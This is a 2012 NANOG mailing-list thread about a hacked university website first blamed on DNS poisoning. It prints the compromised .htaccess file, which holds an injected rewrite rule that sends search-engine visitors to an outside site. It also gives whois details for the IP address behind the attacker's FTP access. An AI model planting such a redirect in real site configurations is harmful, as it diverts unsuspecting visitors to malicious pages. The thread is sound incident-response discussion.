it actually appears that skywire has a suballocation for that block, http://www.robtex.com/ip/208.88.11.111.html#whois # # The following results may also be obtained via: # http://whois.arin.net <http://www.robtex.com/dns/whois.arin.net.html> /rest/nets;q=208.88.11.111 <http://www.robtex.com/ip/208.88.11.111.html> ?showDetails=true&showARIN=false&ext=netref2 # American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0<http://www.robtex.com/ip/208.88.11.0.html> - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html> Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0<http://www.robtex.com/ip/208.88.8.0.html> - 208.88.11.255 <http://www.robtex.com/ip/208.88.11.255.html> # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net<http://www.robtex.com/dns/www.arin.net.html> /whois_tou.html # On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black <Matthew.Black@csulb.edu>wrote:
By the way, FTP access originated from: 208.88.11.111
Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255
NetRange: 208.88.8.0 - 208.88.11.255 CIDR: 208.88.8.0/22 OriginAS: AS40603 NetName: SKYWIRE-SG NetHandle: NET-208-88-8-0-1 Parent: NET-208-0-0-0-0 NetType: Direct Allocation Comment: http://www.skywireusa.com RegDate: 2008-03-04 Updated: 2012-03-02 Ref: http://whois.arin.net/rest/net/NET-208-88-8-0-1
OrgName: Sky Wire Communications OrgId: DGSU Address: 946 W Sunset Blvd Ste L City: St George StateProv: UT PostalCode: 84770 Country: US RegDate: 2007-12-04 Updated: 2009-11-04 Ref: http://whois.arin.net/rest/org/DGSU
Who We Are Skywire Communications is the Leading High Speed Internet Provider in Southern Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to provide high speed internet access to 100 Percent of Southern Utah. We are located in St George, Utah.
matthew black information technology services california state university, long beach
-----Original Message----- From: Matthew Black [mailto:Matthew.Black@csulb.edu] Sent: Wednesday, June 27, 2012 9:52 AM To: 'Jason Hellenthal'; Arturo Servin Cc: nanog@nanog.org Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS)
Ask and ye shall receive:
# more .htaccess (backup copy)
#c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt
avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea
rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d
ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel
and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea
rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|
jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l
ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse
arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea
rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s
uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin
e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|
westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] </IfModule> #/c3284d#
# # #
matthew black information technology services california state university, long beach
-----Original Message----- From: Jason Hellenthal [mailto:jhellenthal@dataix.net] Sent: Wednesday, June 27, 2012 6:26 AM To: Arturo Servin Cc: nanog@nanog.org Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded)
On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote:
It was not DNS issue, but it was a clear case on how community-support
helped.
Some of us may even learn some new tricks. :)
Regards, as
Sent from mobile device. Excuse brevity and typos.
On 27 Jun 2012, at 05:07, Daniel Rohan <drohan@gmail.com> wrote:
On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer <
bortzmeyer@nic.fr>wrote:
What made you think it can be a DNS cache poisoning (a very rare
event, despite what the media say) when there are many much more realistic possibilities (<troll>specially for a Web site written in PHP</troll>)?
What was the evidence pointing to a DNS problem?
It seems likely that he made a mistake in his analysis of the evidence. Something that could happen to anyone when operating outside of a
comfort
zone or having a bad day. Go easy.
-DR
--
- (2^(N-1))
-- Kyle Creyts Information Assurance Professional BSidesDetroit Organizer